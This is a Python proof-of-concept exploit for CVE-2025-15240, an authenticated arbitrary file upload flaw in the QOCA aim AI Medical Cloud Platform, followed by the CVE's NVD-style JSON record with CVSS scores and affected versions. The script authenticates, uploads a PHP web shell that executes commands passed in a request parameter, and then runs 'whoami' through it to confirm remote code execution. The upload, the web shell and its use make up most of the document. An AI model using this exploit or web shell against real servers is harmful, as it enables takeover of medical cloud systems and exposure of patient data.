CVE-2025-15240

import requests import sys # CVE-2025-15240 PoC - QOCA aim AI Medical Cloud Platform Arbitrary File Upload # Target: QOCA aim AI Medical Cloud Platform # Vulnerability: Arbitrary File Upload leading to RCE def exploit(target_url, username, password): """ Exploit arbitrary file upload vulnerability in QOCA aim platform """ session = requests.Session() # Step 1: Authentication login_url = f"{target_url}/api/auth/login" login_data = { "username": username, "password": password } try: response = session.post(login_url, json=login_data, timeout=10) if response.status_code != 200: print(f"[-] Authentication failed: {response.status_code}") return False print("[+] Authentication successful") # Step 2: Upload malicious Web Shell upload_url = f"{target_url}/api/file/upload" # PHP Web Shell payload webshell_content = "<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; } ?>" files = { 'file': ('shell.php', webshell_content, 'application/x-php') } upload_response = session.post(upload_url, files=files, timeout=10) if upload_response.status_code == 200: data = upload_response.json() if 'file_path' in data: file_path = data['file_path'] print(f"[+] Web Shell uploaded successfully: {file_path}") # Step 3: Execute commands via Web Shell shell_url = f"{target_url}{file_path}" cmd = "whoami" exec_response = session.get(f"{shell_url}?cmd={cmd}", timeout=10) if exec_response.status_code == 200: print(f"[+] RCE Successful! Command output: {exec_response.text}") return True print("[-] Exploitation failed") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) != 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://target.com admin password123") sys.exit(1) exploit(sys.argv[1], sys.argv[2], sys.argv[3])

{"cve": {"id": "CVE-2025-15240", "sourceIdentifier": "[email protected]", "published": "2026-01-05T09:15:54.250", "lastModified": "2026-01-20T21:10:57.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "QOCA aim AI Medical Cloud Platform developed by Quanta Computer has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quantatw:qoca_aim:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.7.6", "matchCriteriaId": "4D325141-836B-4D68-87D4-9E4BD8F2A80F"}]}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10616-cd942-2.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.twcert.org.tw/tw/cp-132-10615-157a3-1.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}